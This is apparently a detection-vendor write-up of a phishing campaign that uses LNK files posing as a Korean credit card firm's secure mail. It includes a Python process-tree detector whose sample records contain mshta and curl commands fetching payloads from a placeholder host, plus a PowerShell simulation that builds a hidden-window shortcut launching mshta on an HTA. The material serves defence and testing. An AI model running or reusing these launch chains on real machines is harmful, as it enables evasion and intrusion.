Fake “Secure Mail” Lures Deliver Malicious Files Posing as Credit Card Firms
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
AhnLab uncovered a phishing campaign that delivers malicious LNK files disguised as secure mail notifications from a major Korean credit card provider. When opened, the shortcut launches an HTA through mshta.exe and PowerShell, then downloads follow-on payloads that change depending on whether Windows Defender is enabled. If Defender is active, the attackers use curl to retrieve encrypted files that are later decompressed and executed. If Defender is disabled, the chain shifts to direct DLL loading and additional downloader activity. The resulting malware supports information theft, keylogging, clipboard collection, and backdoor capabilities.
Investigation
The investigation showed that the initial LNK file launches mshta.exe, which runs an HTA containing obfuscated VBScript. That HTA downloads pipe.zip, which includes Base64-encoded scripts named 1.log, 1.ps1, and 2.log, all of which are decoded and executed in memory. When Defender is inactive, the malware instead downloads user.txt and sys.log, decrypts sys.log into sys.dll, and executes it through rundll32. Analysis of the decrypted user.txt exposed three Google Drive URLs used to fetch additional malicious files, including notepad.log, net, and app, which are stored under %LOCALAPPDATA%.
Mitigation
Recommended defenses include verifying the legitimacy of email attachments, preventing automatic execution of LNK files, and monitoring for suspicious use of mshta.exe and curl. Security teams should also search for and remove files such as 1.log, 1.ps1, 2.log, notepad.log, net, and app from %TEMP% and %LOCALAPPDATA%. In addition, defenders should inspect the system for unexpected registry changes and ensure that Windows Defender or another endpoint protection platform remains enabled and properly configured.
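The process-tree checks this section calls for (PowerShell spawning mshta.exe, curl running under a script host, rundll32 loading a DLL from a user-writable path, and the staging file names named above), run over constructed Sysmon-style process-creation records. This is an added example, not code from the AhnLab report or from this detection content; the PIDs, the user profile path, the 203.0.113.7 address and the rule names are placeholders chosen for the illustration.

```python
import re
# Constructed Sysmon-style process-creation records (Event ID 1, simplified).
# PIDs, the user profile path and 203.0.113.7 are placeholders, not report indicators.
EVENTS = [
    {"pid": 100, "ppid": 10, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -NoProfile -WindowStyle Hidden -Command "mshta.exe http://203.0.113.7/s.hta"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe", "cmd": "mshta.exe http://203.0.113.7/s.hta"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl.exe -o C:\Users\u\AppData\Local\Temp\pipe.zip http://203.0.113.7/pipe.zip"},
    {"pid": 500, "ppid": 200, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Users\u\AppData\Local\Temp\sys.dll,Run"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": "rundll32.exe shell32.dll,Control_RunDLL"},  # benign control record
]
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"\\AppData\\Local\\|\\Temp\\", re.I)
# Staging file names the report lists under %TEMP% / %LOCALAPPDATA% ("net" and "app" are too generic to key on).
ARTIFACTS = re.compile(r"\\(1\.log|1\.ps1|2\.log|pipe\.zip|user\.txt|sys\.log|sys\.dll|notepad\.log)\b", re.I)
URL = re.compile(r"https?://", re.I)

def image_name(ev): return ev["image"].rsplit("\\", 1)[-1].lower()

def ancestors(ev, by_pid):
    """Image names of the parent chain, closest parent first; guards against PID-reuse loops."""
    chain, seen, cur = [], set(), by_pid.get(ev["ppid"])
    while cur and cur["pid"] not in seen:
        seen.add(cur["pid"]); chain.append(image_name(cur)); cur = by_pid.get(cur["ppid"])
    return chain

def detect(events):
    """Return {pid: [rule names]} for every record matching at least one chain-specific rule."""
    by_pid, hits = {e["pid"]: e for e in events}, {}
    for ev in events:
        name, cmd, parents, found = image_name(ev), ev["cmd"], ancestors(ev, by_pid), []
        if name in ("powershell.exe", "pwsh.exe") and "mshta" in cmd.lower():
            found.append("powershell_cmdline_invokes_mshta")   # LNK target: PowerShell -> mshta
        if name == "mshta.exe" and parents[:1] == ["powershell.exe"]:
            found.append("powershell_spawns_mshta")
        if name == "mshta.exe" and URL.search(cmd):
            found.append("mshta_remote_hta")                   # HTA fetched from a URL
        if name == "curl.exe" and SCRIPT_HOSTS & set(parents):
            found.append("curl_under_script_host")             # Defender-enabled branch
        if name == "rundll32.exe" and USER_WRITABLE.search(cmd):
            found.append("rundll32_dll_from_user_path")        # Defender-disabled branch
        if ARTIFACTS.search(cmd) and USER_WRITABLE.search(cmd):
            found.append("known_staging_artifact")
        if found: hits[ev["pid"]] = found
    return hits
```

The benign rundll32 record (shell32.dll from System32) is there to show the user-path check does not fire on ordinary rundll32 use; real telemetry would be fed in from the EDR or SIEM export instead of the inline list.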
Response
If this activity is detected, isolate the affected system immediately, terminate any mshta.exe, curl, or rundll32 processes executing unknown files, and preserve the malicious artifacts for forensic review. Run a full system scan, reset any potentially exposed credentials, and monitor for follow-on backdoor activity linked to notepad.log. Detection content should also be updated with the observed indicators of compromise, and email security controls should be strengthened to block similar phishing lures in the future.
"graph TB %% Class definitions classDef action fill:#99ccff classDef operator fill:#ff9900 classDef builtin fill:#cccccc %% Nodes initial_user_exec["<b>Technique</b> – <b>T1204.002 User Execution: Malicious File</b><br/>Victim opens .lnk disguised as secure email from creditu2011card company."] class initial_user_exec action exec_mshta["<b>Technique</b> – <b>T1218.005 System Binary Proxy Execution: Mshta</b><br/>LNK launches PowerShell which runs mshta.exe to fetch remote HTA containing obfuscated VBScript."] class exec_mshta action exec_powershell["<b>Technique</b> – <b>T1059.001 Command and Scripting Interpreter: PowerShell</b><br/>PowerShell downloads additional payloads via curl."] class exec_powershell action masquerade["<b>Technique</b> – <b>T1036.008 Masquerading: Masquerade File Type</b><br/>LNK file masquerades as secure mail."] class masquerade action obfuscate["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/>Payloads encrypted with AES, Base64u2011encoded; LNK icon smuggling."] class obfuscate action sandbox_evasion["<b>Technique</b> – <b>T1497.002 Virtualization/Sandbox Evasion: User Activity Based Checks</b><br/>Malware checks Windows Defender status."] class sandbox_evasion action cond_defender["<b>Operator</b> – AND condition based on Defender status"] class cond_defender operator defender_on["<b>Condition</b> – Defender enabled"] class defender_on action defender_off["<b>Condition</b> – Defender disabled"] class defender_off action download_pipe["<b>Action</b> – Downloads pipe.zip, decrypts and extracts 1.log, 1.ps1, 2.log."] class download_pipe action cred_access["<b>Technique</b> – <b>T1539 Browser Session Hijacking</b>, <b>T1185 Web Session Cookie</b>, <b>T1555.003 Credentials from Web Browsers</b><br/>Scripts perform credential access."] class cred_access action collection["<b>Technique</b> – <b>T1056.001 Input Capture: Keylogging</b> and <b>T1115 Clipboard Data</b><br/>Collect keystrokes and clipboard contents."] class 
collection action download_sys["<b>Action</b> – Downloads user.txt and sys.log, decrypts sys.dll."] class download_sys action load_rundll["<b>Technique</b> – <b>T1218.011 Signed Binary Proxy Execution: Rundll32</b><br/>Loads sys.dll via rundll32."] class load_rundll action persistence_appinit["<b>Technique</b> – <b>T1546.010 Event Triggered Execution: AppInit DLLs</b><br/>sys.dll used for persistence/evasion."] class persistence_appinit action command_control["<b>Technique</b> – <b>T1219 Remote Access Tools</b><br/>notepad.log provides remote command execution, file exfiltration and further data collection."] class command_control action clipboard_phish["<b>Technique</b> – <b>T1204.004 Malicious Copy and Paste</b><br/>Clipboard phishing techniques."] class clipboard_phish action %% Connections initial_user_exec –>|leads to| exec_mshta exec_mshta –>|executes| exec_powershell exec_powershell –>|enables| masquerade masquerade –>|enables| obfuscate obfuscate –>|enables| sandbox_evasion sandbox_evasion –>|triggers| cond_defender cond_defender –>|if Defender enabled| defender_on cond_defender –>|if Defender disabled| defender_off defender_on –>|downloads| download_pipe download_pipe –>|contains| cred_access cred_access –>|enables| collection defender_off –>|downloads| download_sys download_sys –>|loads| load_rundll load_rundll –>|establishes| persistence_appinit persistence_appinit –>|enables| command_control command_control –>|uses| clipboard_phish "
Attack Flow
Detections
- Possible Execution by Use of Short Script Name (via cmdline)
- Suspicious LOLBAS MSHTA Defense Evasion Behavior by Detection of Associated Commands (via process_creation)
- Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
- Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)
- Rundll32 Execution with sys.dll in Disabled Windows Defender Environments [Windows Process Creation]
- Malicious LNK File with mshta Command Execution [Windows Powershell]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Attack Narrative & Commands:
An adversary has obtained a foothold on the endpoint and wishes to execute arbitrary code while evading traditional application control. They craft a malicious HTA file containing obfuscated VBScript that, when rendered, writes a PowerShell back‑door to disk. To launch the HTA, they use a Windows shortcut (.lnk) that calls powershell.exe with a command that invokes mshta.exe. Executing the shortcut triggers the PowerShell → mshta chain, producing the exact telemetry the rule monitors.
Regression Test Script:
```powershell
# -------------------------------------------------
# 1. Create test HTA with VBScript payload
# -------------------------------------------------
$htaPath = "$env:TEMP\evil.hta"
$vbscript = @"
<script language='VBScript'>
' VBScript payload used for the test (writes a marker file)
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile("C:\Windows\Temp\pwned.txt", True)
f.WriteLine "Compromised by ATT&CK"
f.Close
</script>
"@
Set-Content -Path $htaPath -Value $vbscript -Encoding ASCII

# -------------------------------------------------
# 2. Create a shortcut (.lnk) that runs PowerShell -> mshta
# -------------------------------------------------
$lnkPath = "$env:TEMP\launch_malicious.lnk"
$ws = New-Object -ComObject WScript.Shell
$shortcut = $ws.CreateShortcut($lnkPath)
# PowerShell command that launches mshta with the HTA file.
# Single quotes around the path avoid nesting double quotes inside the -Command string.
$psCommand = "mshta.exe '$htaPath'"
$shortcut.TargetPath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$shortcut.Arguments = "-NoProfile -WindowStyle Hidden -Command `"$psCommand`""
$shortcut.Save()

# -------------------------------------------------
# 3. Execute the shortcut to trigger the detection
# -------------------------------------------------
Write-Host "Executing test shortcut..."
& $lnkPath

# -------------------------------------------------
# 4. Pause to allow logs to be collected
# -------------------------------------------------
Start-Sleep -Seconds 10
```
Cleanup Commands:
```powershell
# Remove created artifacts
Remove-Item -Path "$env:TEMP\evil.hta" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMP\launch_malicious.lnk" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "C:\Windows\Temp\pwned.txt" -Force -ErrorAction SilentlyContinue
Write-Host "Cleanup complete."
```